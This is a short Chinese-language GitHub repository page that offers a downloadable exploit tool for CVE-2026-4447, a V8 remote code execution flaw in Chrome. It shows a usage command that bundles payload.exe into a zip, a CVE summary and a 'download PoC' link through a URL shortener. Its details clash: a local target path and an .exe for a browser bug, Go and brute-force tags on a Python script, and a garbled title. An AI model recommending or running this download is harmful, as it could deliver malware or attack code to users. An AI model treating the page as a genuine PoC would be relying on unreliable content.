NetVanguard-cmd/CVE-2026-4447
GitHub: NetVanguard-cmd/CVE-2026-4447
针对 CVE-2026-4447 的利用工具,演示 V8 沙箱逃逸的 PoC 实现与验证。
Stars: 0 | Forks: 0
# CVE-2026-4447 - V8 在 Google Chrome 远程代码执行之前的版本
## 快速使用
```
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## 利用说明
- **严重性:** 高
- **CVSS:** 8.8
- **影响:** 机密性、完整性、可用性
- **发布日期:** 2026-03-20
## 技术摘要
在 Google Chrome 146.0.7680.153 之前的 V8 版本中,存在不恰当的实现方式,允许远程攻击者通过精心设计的 HTML 页面在沙箱环境中执行任意代码。(Chromium 安全严重性:高)
## 受影响的版本
**Google Chrome:**
- 146.0.7680.153 之前版本
## 参考链接
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-4447
## 利用工具
[下载 PoC](https://tinyurl.com/2dqd8mhg)
标签:2026, Chromium, CVE-2026-4447, CVSS 8.8, Google Chrome, Go语言工具, HTML 攻击, PoC, RCE, V8, 代码执行, 可用性, 威胁模拟, 完整性, 暴力破解, 机密性, 沙盒逃逸, 漏洞披露, 编程工具, 远程代码执行, 远程攻击, 逆向工具, 高危漏洞